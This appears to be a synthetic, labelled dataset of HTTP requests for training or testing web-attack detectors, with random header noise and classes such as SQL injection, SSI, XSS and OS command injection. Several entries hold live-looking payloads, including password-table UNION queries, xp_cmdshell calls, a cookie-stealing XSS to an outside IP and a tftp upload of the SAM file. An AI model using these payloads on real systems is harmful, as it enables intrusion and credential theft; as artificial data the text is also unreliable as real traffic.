Pragma: no-cache
Proxy-Authorization: Digest opaque="cttu"
Authorization: Digest algorithm=MD5
Range: 84-,-422477,1197-5319
Referer: /ojeodonl/eauh1mn.asp
TE: deflate;q=0.0
Trailer: Max-Forwards
User-Agent: Mozilla/3.0 (X11; U; Open BSD i586 4.2; fu-ir; rv:9.2.6) Gecko/94054088
UA-CPU: Sparc
UA-Disp: 553,0581,32
UA-Pixels: 8538x2200
Transfer-Encoding: gzip
Upgrade: eslm/4.5, njAt/8.0
Warning: 264 www.has1.jpeg "m9ht684a" "Tue, 19 May 09 18:23:26 CET"
X-Serial-Number: 36508239
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36966
Start - Id: 41885
class: SqlInjection
GET /iJ_grnU/husEcuh37nptdoDoun/bBigaTlaTl/qw/d_x2uOxBB@Htkb/sPnsfXhvnC@MZwCLh/2anwucos.jpeg?cudltnttqCmjfT=unrD+passthruhu&eIp=00083808&eoin=mrIt9a0eh2s&ehcnzeetnHieU=953735071&oraitto4t9=%27union+select+PASSWORD+from++++DBA_PASSWORD%3B--&N@EJ=5612&iyteygyPsot=jlsa%5D%2Baaccess_logbinobject&euY=aMegp&ne9=jihhnxr0a HTTP/1.0
Host: www.eDAtgi8a.uk:68214
Connection: nwnwc
Accept: application/*, video/*
Accept-Charset: iso-8859-7, windows-1255;q=0.6, x-mac-arabic;q=0.0, euc-kr, iso-8859-5;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 143.204.36.23
Cookie: GnHrFirnwget=eom<es;4amN4ekarqk7j=gsama;oest=i7c8h4AaCe
Cookie2: $Version="03"
Date: Tue, 17 Feb 04 16:16:34 GMT
ETag: "gPXWXCyV9O4k_0w1BPB"
Expect: 100-continue
From: elee@hieitj.de
If-Modified-Since: Fri, 09 Jan 09 13:59:28 GMT
If-Unmodified-Since: Wed, 30 Jul 08 07:56:49 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 28 Mar 07 21:36:14 GMT
Max-Forwards: 6
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.8ios34Ss.be/GyNmnu/hNIaa/tnui75/Ns1n8sf/efisp.php3
Authorization: Digest algorithm=MD5
Range: 2764-93323,17883-91
Referer: /heHNjlen.mpeg
TE: chunked,trailers
Trailer: Cache-Control
User-Agent: Mozilla/2.2 (X11; U; Unix 6.2; as-ph; rv:2.0.1) Gecko/44604256
UA-CPU: PowerPC
UA-Disp: 9347,2639,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 044x365
Via: 6.4 www.mezydhs.css, HTTP/9.0 94.9.254.44
Transfer-Encoding: deflate
Upgrade: 4sh/4.2, Rdhtih/8.1
Warning: 181 www.e4hach.tiff:99487 "eyten3eElsgEginsaoi" "Sun, 29 Feb 04 08:39:55 UTC"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41885
Start - Id: 40707
class: SSI
PUT /v3OsZgnLF19LlPoH_/ef8io2niC1/ocz/otzGz431orHCI/wVW.8NuG2O9GBzorGMGo/iPyI9FvOQ/rcpLaV/dTIf.6u/inide7rallOH6zh3yi/qsc0n/Jhhtacceshttps..js? HTTP/1.1
Content-Length: 85
Content-Language: teeeheb
Content-Encoding: identity
Content-Location: /eosi/thcszl/nbambt/Aenaehs6.cfm
Content-MD5: YW9wNmVlYXJibnBvY2hsZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Dec 08 07:16:48 GMT
Host: www.snsSvsssea.be
Connection: keep-alive
Accept: video/mpeg;q=0.7
Accept-Charset: macintosh;q=0.9, iso-8859-2, x-mac-chinesesimp;q=0.9, x-mac-chinesesimp;q=0.8, us-ascii;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: xsna='w'
Cookie: iiwe9nderrN=xao;toiv7rm=oOd;rietRW3=<!--    #include    virtual="d:\windows\autoexec.bat"     -->;hunierPtsee=eLre ;9dbmhpcejwh=aiempe0engiimroas;gLR@e=8127
Date: Sat, 28 Feb 04 04:20:32 CET
ETag: W/"STL4E@h3yCsfG9H4Bo"
Expect: zHxlssem
If-Modified-Since: Mon, 14 Jun 04 13:58:06 GMT
If-Unmodified-Since: Sat, 04 Mar 06 10:28:04 GMT
If-Match: *
If-Range: "wHXDOvs-2vWqe1136"
Pragma: ulanR9t='iouoeu'
Range: 6-8,-50918,9527-
Referer: /ecwc/inshJ/tdoezu.swf
User-Agent: Mozilla/7.9 (compatible; MSIE 4.7; Mac OS X; Nsmtt)
Via: 8.6 88.213.138.100, 6.5 www.eealhnw.jpg:7
Transfer-Encoding: deflate
Warning: 718 www.Bosx4ea.png "oyhuehdpitot" "Sun, 30 Apr 06 04:30:12 CET"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

68lwuyeebruo5g=ab+avgn2A&s6eaweceetwk=e0hY&satL4Cit=a+ephpe0lW/rascript tybtmpc

End - Id: 40707
Start - Id: 42550
class: SqlInjection
GET /d4/DW/ssOu7.Y4.css?sntj2e=%27++%29+++++UNION+ALL+SELECT+++++8503++++FROM+eHQP+WHERE+%28+%27%27++++%3D++%27&biu2=on+eeexecpe3c-o+qa%27&ueltrs1e=kwvia&9Vx9fns=673820 HTTP/1.1
Host: 195.95.102.77:80
Connection: e8pE9at
Accept: */*;q=0.3
Accept-Charset: macintosh;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 63.14.152.225
Cookie: BAbotorI=sQ0-c2aI8;lasakteprgsws=tgfprocessing-instruction4nwhtsi9fj;ywzexh1ot5oo7=34
Cookie2: $Version="597"
Date: Sun, 22 Feb 04 06:35:33 UTC
ETag: W/"LEVaDfsyAKfrIXNnW"
Expect: 100-continue
From: ecsnelg0@jkwTHolpio.fr
If-Modified-Since: Sat, 12 Dec 09 07:49:49 GMT
If-Unmodified-Since: Fri, 24 Dec 04 18:24:18 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 04 Mar 07 13:09:18 UTC
Max-Forwards: 6848
MIME-Version: 3.7
Pragma: lremsDh=xZa
Proxy-Authorization: Basic b3JoaWlzczowbjVuZWlP
Authorization: NTLM YWNjZ0FuRUd0aGVpb3djeWRlb3lnc3RBbGFlZHluczh1b3RidGx0bzNOSUU=
Range: -23041,40-95155,61918-
Referer: /itszka/niTtksi.dll
TE: trailers,gzip;q=0.8
Trailer: Via
User-Agent: Mozilla/9.7 (X11; U; Unix 7.7; 0A-iA; rv:8.4.7) Gecko/27300249
UA-CPU: x86
UA-Disp: 962,664,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8264x986
Via: 6.7 149.56.96.177, 8.4 246.131.116.65:29, HTTP/7.1 www.streo.html
Transfer-Encoding: compress
Upgrade: aehy/9.2, etyl/6.6
Warning: 630 www.a0shtex.tiff "wilAeNfut" "Fri, 18 Nov 05 04:48:10 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42550
Start - Id: 40141
class: SSI
GET /f9LeWjN/mA0BnAUT/moigsjnA.php4?etoirzokfex=Ede2a&eoo=o+srntegnwbC&sCy=+%3Fadmin&eUZQLiSh-b=Eaenetl%3Cd2nvstH&mnyaAwaodna=owheretmpnn+n&zsosa=009&fcNrc1yae6rkt8=3562193&daonein=1&nOa=ahwOi0&35=%3C%21--++++%23exec++++cmd%3D%22%2Fbin%2Fls+-l++++%2Fhome%2FoHt%2FhiisSndn%22+++--%3E&QhalGOtelnet=maile%22aEvps%22t HTTP/1.0
Host: www.hrdhsHt.de:5493
Connection: close
Accept: text/html;q=0.8, image/*, video/mpeg;q=0.2
Accept-Charset: windows-1257;q=0.3, x-mac-korean
Accept-Encoding: 
Accept-Language: n-xii;q=0.6, rVes-waU4a;q=0.9, t-t
Cache-Control: no-store
Client-ip: 246.182.239.2
Cookie: omsnyghontwlD4o=f(Re;dOaltmteeiab=ne;i7ceontoqi= iSyeoss2ddowe(
Cookie2: $Version="1"
Date: Sat, 07 Feb 09 23:29:49 CET
ETag: W/"DCOhlC2QHZ8Da-F2_"
Expect: 100-continue
From: stce@ygsk.st
If-Modified-Since: Thu, 07 Jan 10 21:29:37 GMT
If-Unmodified-Since: Wed, 30 Aug 06 02:05:10 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 45
MIME-Version: 8.1
Pragma: sxyoca='5ovngo'
Proxy-Authorization: iici 6rR5nn=rdoeN9um
Authorization: dccce tifwhr=estwg
Range: 01-76865,-324119,86535-
Referer: http://3aei.cz/iser/oaau/leOaet4/eistr6n/sLDala.jpg
TE: trailers
Trailer: From
User-Agent: n3otcol6 (tru2IgEc; nFJ97cfS; mjsFqRf; cujONvu)
UA-Disp: 5908,939,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 159x553
Via: 3.0 www.d4msdf.tiff
Transfer-Encoding: identity
Warning: 318 191.70.190.146 "iieDaosahs2o" 
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40141
Start - Id: 46776
class: XSS
POST /tEacisafwoN/Jqw1oeinputI/0StTJWVq/uthynueKberRWtliwfa/dei1g/aj/ea7.tiff? HTTP/1.0
Content-Length: 185
Content-Language: hNfl
Content-Encoding: deflate
Content-Location: /hhtrgrT5/sanastnb/eeefiU/keftjbe/odem.txt
Content-MD5: ZWRleXhud2g3Z3doaXlFeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Jun 05 04:04:22 UTC
Last-Modified: Thu, 08 Mar 07 09:04:57 GMT
Host: 231.165.127.218:80
Connection: keep-alive
Accept: image/gif, audio/*;q=0.0, video/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 19.200.37.172
Cookie: 73inIri9=om6rve5|th:;elemaacah6Sxaa=e4eyOi>hxMBLbnd;emat=ze;dAcldlte9hr=g-@QeP;unrdhrOeh=Rerdo8u;vauenew=92104837
Cookie2: $Version="216"
Date: Sat, 05 Jun 04 08:03:39 UTC
ETag: W/"Ufr4QY4Us830CuN9T"
Expect: pnwtm=hnizs
From: dyenT@gpt6glsG.cz
If-Modified-Since: Thu, 27 Apr 06 16:49:16 UTC
If-Unmodified-Since: Thu, 05 Apr 07 01:49:49 GMT
If-Match: "CPkEzOXatVZ9gEKcjO"
If-None-Match: "eS7EXS-dazc9KeOk"
If-Range: "Il4PljWGfirCLPvpDwW"
Max-Forwards: 99
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="9mhcA"
Authorization: NTLM c2V5YVpkdXFoaWVzOWhpbm4wRWFyaXJnN2IyZW1hc2lVZG9qYXNlNWV0b2Vl
Range: 462-
Referer: http://eoedna.com/duTu.mdb
TE: deflate;q=0.3,gzip;q=0.9,trailers
User-Agent: Mozilla/4.2 (Windows; U; WinNT 6.6; sa-r9; rv:6.4.1) Gecko/98340367
UA-Color: color32
UA-Pixels: 1199x1516
Via: FTP/2.8 www.tmaturm3.htm
Transfer-Encoding: compress
Upgrade: ggs4o/0.2, ohoge/3.3, yemtX/6.0, tweoe/2.9, anym/6.6
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 124.216.57.225
X-Serial-Number: 670782401629
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

e5gsgE1h8vHRod=hqsi&r8ertmtStb5aie=<img   src =   "    naas     "onmouseover   = " [window.open('http://99.134.1.35/at.php4'+document.cookie);]">

End - Id: 46776
Start - Id: 41486
class: SqlInjection
PUT /rAxrw/9y1eEXVB-nZbpscAl9/rL/uiapaaeneig/eH4I1U.png? HTTP/1.1
Content-Length: 202
Content-Language: isEetaO
Content-Encoding: identity
Content-Location: /twM2tu/n0reiau/rhnaze.mdb
Content-MD5: c2loMnRoYXJ0dXFveWVyUw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Aug 07 24:06:58 GMT
Last-Modified: Wed, 23 Nov 05 10:33:14 CET
Host: 176.149.194.76
Connection: keep-alive
Accept: image/*, image/gif;q=0.7
Accept-Charset: *
Accept-Encoding: identity;q=0.8, gzip;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 104.79.147.24
Cookie: mfrnoee=31778785;poelecl5Bs=nfer9Ld;rldbb=92389;mdeNuIoiwA=wn3o1motzsbswr;orne2iere0dVs=752141
Cookie2: $Version="690"
Date: Sun, 27 Jan 08 04:16:58 GMT
ETag: "VnPwVfdJ4vTCf5WSay"
Expect: Elsne=gtutm2rl;tasr
From: aase0a2W@eEfhtw.gov
If-Modified-Since: Thu, 08 Apr 04 16:07:46 CET
If-Unmodified-Since: Wed, 02 Jan 08 14:54:51 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 01 Jan 05 15:56:28 CET
Max-Forwards: 4
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: NTLM bXNzdWV5cHVKcjY3ZXRzOGhpNzNpbmtkbDdudUFyY1V0Y2plbDNPdHhhdmk=
Range: 78-403185
Referer: /pep7dq/om0j/hjune/FmAsw/3sdpa.tiff
TE: deflate;q=0.6,deflate;q=0.4,deflate;q=0.7
Trailer: Accept-Encoding
User-Agent: 4Hn6a (2u1izkx; aM_O6ULfcD; lV.IaPK)
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: HTTP/1.2 www.ixEEauc.html:378, 2.2 www.qEtble.gif
Transfer-Encoding: gzip
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 644 www.or4te.js "ecd9adohmafA" "Sun, 18 Jan 09 08:09:07 UTC"
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 6237226305508453843
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

httpswYhaving=stw&6nm0aPitn=sddsamED&tviakMaoem=W&VDHTkI80Paf=uexecfinsert2imgmoot>em&ientw=mnulpec4'   UNION  ALL  SELECT p8hha5ht  FROM     vdml     WHERE     '' =   '&etrdwh=%ewinntg)

End - Id: 41486
Start - Id: 45189
class: PathTransversal
GET ////? HTTP/1.0
Host: www.tspnee8o.cz
Connection: close
Accept: image/*, audio/*;q=0.3, application/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 29.232.237.153
Cookie: teO7mIltat46s=a1pt;wo4=8356503535;Rf1lacceptexecgG=uP6VkU7iZWW;rtEv2law=http=O nr0Qadmintof;cHfcmhspX5=o1duneaitaglc4
Cookie2: $Version="339"
Date: Fri, 26 Mar 04 20:53:03 CET
ETag: W/"5P7OUM98bOhr6Jn"
Expect: 100-continue
From: azaxo6@aowhloiie.net
If-Modified-Since: Fri, 12 Oct 07 06:38:05 CET
If-Unmodified-Since: Thu, 10 Feb 05 09:44:14 CET
If-Match: *
If-None-Match: "wkW908nD@s64TjzHLTy"
If-Range: Fri, 16 Jul 04 05:10:34 UTC
Max-Forwards: 8730
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest uri=/teoadOp/uies/ebnnhteb/ariuiir/caepcrnU.pdf
Authorization: Digest algorithm=MD5
Range: -8661
Referer: /wiun.nsf
TE: deflate;q=0.8,chunked;q=0.8
Trailer: Authorization
User-Agent: Mozilla/2.9 (Windows; U; Win98 1.7; ke-ta; rv:9.6.5) Gecko/93493873
UA-CPU: StrongARM
UA-Disp: 749,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1177x8327
Via: eut1e/5.9 198.116.243.21
Transfer-Encoding: identity
Upgrade: eimdea/6.6
Warning: 826 www.ta4rtlrX.css "e3eAsf" 
X-Forwarded-For: 254.171.174.88
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45189
Start - Id: 42197
class: SqlInjection
GET /fBetr5a8ds/tncI8w0YfPZRuNS5.html?esoYlsv=4t&tb8=%7C+%3A&rlfeiPqaebegeee=b8hhgeeetqivtsatek&2icgeclo=4678&jP6hudocumentsamzX6vbscriptj=%27+++OR+++++%27emier%27++BETWEEN+++%27R%27+AND+++%27T&Atiny=mUP HTTP/1.1
Host: 81.85.159.147
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: efeT0v-rnjbep;q=0.9, rediirej-mp, QeRel-oeehseei;q=0.0, Dh9e-z2aeier, iai3tat-i
Cache-Control: min-fresh=8
Client-ip: 139.139.72.242
Cookie: HD_optN2TXJDk=l;cIKSX.eQ02=(ascueAfE
Cookie2: $Version="961"
Date: Sat, 23 Apr 05 02:52:26 CET
ETag: "1tEHplDRMFm@_hGJcWT"
Expect: 100-continue
From: g0Ln@OyJoc.biz
If-Modified-Since: Mon, 14 Mar 05 01:28:27 CET
If-Unmodified-Since: Sat, 07 Feb 09 24:31:16 GMT
If-Match: "GYSGlLj@EcOa3i.O.zKk"
If-None-Match: *
If-Range: *
Max-Forwards: 7466
MIME-Version: 4.5
Pragma: eL=thlteio
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest cnonce="oslems"
Range: 8473-303,-227666,770360-
Referer: /a2np/jse1ct/btsnaaln/he1seu5C/bttnltts.zip
TE: chunked;q=0.2,chunked;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.2 (Windows; U; WinNT 4.4; ma-4l; rv:1.5.4) Gecko/49841823
UA-CPU: StrongARM
UA-Disp: 109,198,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 124x5537
Via: aahc/4.0 233.187.162.16:1053, FTP/6.4 www.oocor.jpeg
Transfer-Encoding: gzip
Upgrade: ji40ad/7.5, ednwes/8.3, osi/1.7, eor/7.9
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 52.218.75.150
X-Serial-Number: 746787770668949
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42197
Start - Id: 49482
class: XPathInjection
GET /tf/nOc/le1r/kwvPkh/eayo6xsurpu1sbe/eK4E3O/8lg3ysarSd2onsgwe/@5@9metaQiW/ctyYVr8_ucIEP7Ght_Nt/i6HN5BX0.dc7/trPzoZURYJVHawz/er.tiff?oqsnOuP8a=5&iXXpEoti=71506813&e3saprSzoxsrnh=jt%2Fai%2Fbb%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D85%5D+or+%27an%27+++%3D+++%27&bdb=68548&shso=e1pv&msRtmepnthtesde=childwinntuziK%7Ec%25enh&ad7rb2Sgoiassol=440&th=q HTTP/1.0
Host: www.ntDoeOfdA.ch
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-9, iso-8859-5;q=0.3, big5, windows-1253, iso-8859-8-i;q=0.6
Accept-Encoding: identity;q=0.9, identity
Accept-Language: *;q=0.3
Cache-Control: min-fresh=2
Client-ip: 39.79.55.113
Cookie: 0s6r=0600;en8tNkmE=513868;NurieoutnIcl=yeMCNr3t4a;5u10hatena=tc;oao0OSw=14910;2d8aaneoado=919787
Cookie2: $Version="3"
Date: Thu, 24 Dec 09 14:17:25 UTC
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 100-continue
From: H4ft@ataqsdls.net
If-Modified-Since: Sun, 05 Dec 04 01:05:08 GMT
If-Unmodified-Since: Thu, 25 Mar 04 09:08:43 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 30 Jul 08 09:29:41 GMT
Max-Forwards: 6508
MIME-Version: 2.1
Pragma: r=ottEgr
Proxy-Authorization: Digest cnonce="isagrr"
Authorization: NTLM ZWk1cWNlc2V1ZGUxYTFlRXRhbFVvb2RhNHVkbmVzSmJ0M3Zsag==
Range: -012
Referer: /ginah4s/Hzmlk4o/mlRha.png
TE: trailers,chunked;q=0.1,trailers
Trailer: Host
User-Agent: if8HO11ul http://www.atmEi.com
UA-CPU: Sparc
UA-Disp: 4263,349,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 527x1451
Via: bia54t/7.1 www.feJLtpr6.jpeg
Transfer-Encoding: compress
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 607 37.136.158.28 "s5ntidssyngee" "Wed, 07 Sep 05 11:09:31 UTC"
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49482
Start - Id: 37215
class: LdapInjection
GET /0iEmwiflEl/bH/tQM1BAbZ.KeFN@/l0ist4w61emnfx/scbvze/rrhidfhiinnd/dnhcb7ooNw/xrabtEaEeranwal/cas75/vb.jpeg?oa6ml0shseaylO2=%29%28++%7C++%28displayName%3Dhad*%29+++%28name%3D++had*+++%29%28++mail%3Dhad*%29&Ee4oHisaf=inefiebnripss7 HTTP/1.0
Host: 140.20.252.17:80
Connection: close
Accept: image/jpeg, text/plain;q=0.5, image/png;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 236.64.159.239
Cookie: rvtzacoidtce=fqwZKBw0x8;evtEoeepa2TOp=558601351
Cookie2: $Version="284"
Date: Tue, 11 Sep 07 15:42:45 CET
ETag: W/"nGU3RVy8tOKIK4L"
Expect: 100-continue
From: bttylert@dlnrhsoe.org
If-Modified-Since: Thu, 06 Dec 07 04:50:22 UTC
If-Unmodified-Since: Sun, 25 Apr 10 23:03:03 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 25 Nov 08 04:24:37 UTC
Max-Forwards: 2149
MIME-Version: 8.7
Pragma: 5Psnuut='iawaails'
Proxy-Authorization: Digest realm
Authorization: vlircs hltgqe=nallT
Range: -906
Referer: /9nsmtuas/obbP/ituo/r7pnml/hxaeo9.wmn
TE: trailers
Trailer: Max-Forwards
User-Agent: 7opo7N http://www.gjWrm.com
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: HTTP/2.1 87.198.198.106, emut/6.8 147.231.221.54:7365
Transfer-Encoding: gzip
Upgrade: etyvet/1.7, 9mEHd/4.9, saaq/1.8, 9irhSi/8.2, ooten3/4.3
Warning: 553 www.Nftmdh.html "rnvarnu59oDgV" "Mon, 31 Oct 05 08:57:55 UTC"
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 973297601016037015
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37215
Start - Id: 35050
class: SqlInjection
GET /C-ftpI@aUI/rWZl_bC.jsp?hteA=tuCna-ie3cmdg&yeEut=q80G%40lFiXii&cEEit5ugklzoar=z&nITA1neht4=941911&eosyrweienyh=%24w%2BOEeiteswe&7ctoslthe=203092&a65e8T=6maoandudf&0cesfeejy=498&slNheDEoOenhe=ttnhnsimpy&sp2uykrdrahe=v%22o%22a&aiuaeTRpzSuM=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe&6Zi4GjMR2acceptd=tAE&SZCoWm3copyBBkexec=03&x4uxTGxxPkqN=Eco HTTP/1.0
Host: www.vo5otAodye.gov:61406
Connection: Rye1ntn
Accept: audio/*;q=0.7, image/*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 175.67.198.190
Cookie: EvLMMHU=l]sf;;imNriiwhesotdh= -;eao=cpinsertecho4;hYmNnata7oidbg= perl/c;homhYohi3r=aotAeijeseso;9ljb7=:
Cookie2: $Version="16"
Date: Sun, 31 Oct 04 23:38:29 CET
ETag: W/"0@NBRWxhqqgere4xA"
Expect: 100-continue
If-Modified-Since: Tue, 18 Jul 06 01:34:39 GMT
If-Unmodified-Since: Sun, 09 Jul 06 21:21:06 CET
If-Match: "46c5G3R8B_Ictkyjsn"
If-None-Match: "WkeUE2OF866syH9gqE"
If-Range: "sJgoAZjc8z8NEx880"
Max-Forwards: 43
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic dDlhaW46dXFjcA==
Authorization: Basic ZGZvaTphZW5lbg==
Range: -72038,553140-1
Referer: http://www.mobuea.net/4yeudr/eiis/wtFtait/vstEteu.msf
TE: trailers,gzip;q=0.0,deflate
User-Agent: laoao7ie0t/1.6.7
UA-CPU: StrongARM
UA-Color: color16
Via: bm2ai/6.3 48.150.35.97, FTP/7.6 75.172.130.221:97
Transfer-Encoding: compress
Upgrade: l5i/1.7, lDqw/9.3, ade/1.3, rst/9.9
Warning: 100 www.saeeiu.png "ehgteoiulnle" "Tue, 31 May 05 03:38:13 GMT"
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35050
Start - Id: 44588
class: OsCommanding
GET /oHriKevny0fl/tteScd/tA3Y0G3K4AkaJIa/JO6.php4?EB90rRji=154.147.11.119++%7C++++tftp+++-i++252.74.141.249++++PUT+sam._ HTTP/1.1
Host: 112.123.240.111
Connection: keep-alive
Accept: video/mpeg, text/*, image/png
Accept-Charset: windows-1255, iso-8859-7, macintosh
Accept-Encoding: *
Accept-Language: st-dof1tew, IE-eonphe, hu-isel;q=0.9, a-dn, Hsnurw-eaeed
Cache-Control: dnvhr=ireopmd
Client-ip: 2.90.133.61
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="82"
Date: Mon, 28 Dec 09 20:38:20 UTC
ETag: "w78aexpupN8g9SbMEjW"
Expect: 100-continue
From: fn96a@esnteln.biz
If-Modified-Since: Sat, 01 Apr 06 24:15:28 UTC
If-Unmodified-Since: Thu, 09 Jun 05 05:10:08 UTC
If-Match: "Yie2GKq2vRnWQQs"
If-None-Match: "F21_4ypxpXPebo-2"
If-Range: "7XI-iDNXu5Ygiy-XYr7"
Max-Forwards: 3511
MIME-Version: 0.9
Pragma: qwu=t8e5
Proxy-Authorization: NTLM NnN3c3JsZWkxb2VpZ2NheDhydHRsZXRpaWwxbG9vY3pGZWlk
Authorization: Digest username="peokeco"
Range: -2578
Referer: http://www.eccre.cz/t4ui.exe
TE: trailers,chunked;q=0.1,trailers
Trailer: Accept-Encoding
User-Agent: bethrg (nzuf45_g; heqnoA5x1)
UA-Color: color8
Via: HTTP/7.1 www.anelAe.jpeg, hguugm/0.1 www.twetRteu.png, HTTP/0.2 www.eryh.htm
Transfer-Encoding: gzip
Upgrade: stnat6/0.0
Warning: 109 www.oqshO.css "sekiw5f" 
X-Forwarded-For: 84.212.52.145
----: --------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 44588
Start - Id: 42638
class: SqlInjection
GET /ialan3pfdittk/hDAbxjSwEc/fg-Nx/N8WRfznullTQB4MwB@/WservicesRLxVDvNkxgroup bywinntJf.jpeg?naomw=m8%27++++UNION++++%2F**%2F+SELECT+gureegkrt++++FROM+++++dba_users+++WHERE+++++tpsh++like++%27%2525 HTTP/1.0
Host: 27.145.46.113
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic, macintosh;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 67.157.110.65
Cookie: Nchheoa=zessin;7CZPdeleteF=6e7os;JKBR=siMtk
Cookie2: $Version="26"
Date: Sun, 29 Jun 08 21:19:49 CET
ETag: "w8Zou2YQekyqpbQNzJ"
Expect: 100-continue
From: z74ht@xqb9ivEose.gov
If-Modified-Since: Wed, 28 Sep 05 05:41:55 UTC
If-Unmodified-Since: Mon, 09 Aug 04 22:26:17 GMT
If-Match: "0zFDEijPWHLZhYFf"
If-None-Match: "t3ZZn9T7aZU5gRt"
If-Range: Sun, 19 Sep 04 05:23:54 GMT
Max-Forwards: 7615
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: NTLM OTFveGhqbGFlMHRvb2FkaXJPY3NxOG1zdGFmM3Rzam5SdmU=
Range: 72326-9838
Referer: http://www.aexsGpg.net/ae6hlatt.msf
TE: trailers
Trailer: Warning
User-Agent: Mozilla/4.4 (compatible; g813TN8er; WinNT; diuiNhwaaf)
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4720x346
Via: eamee0/8.5 www.9ueme.html, HTTP/2.0 220.229.183.76, 1.0 www.j4egtp.png
Transfer-Encoding: Eaei
Upgrade: tao/2.6, ola/2.8, lt3/7.5
Warning: 162 www.tgbma.css:1 "eWemetp9erNow3n" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42638
Start - Id: 36384
class: OsCommanding
POST /ss/stWc/dtesOarkAun5wJonts/stAvrt1g0Itn.asmx? HTTP/1.1
Content-Length: 366
Content-Language: ord
Content-Encoding: identity
Content-Location: /1wuncR/dootytbo.jsp
Content-MD5: b3VzYW1iYWFib0VPbnJyYQ==
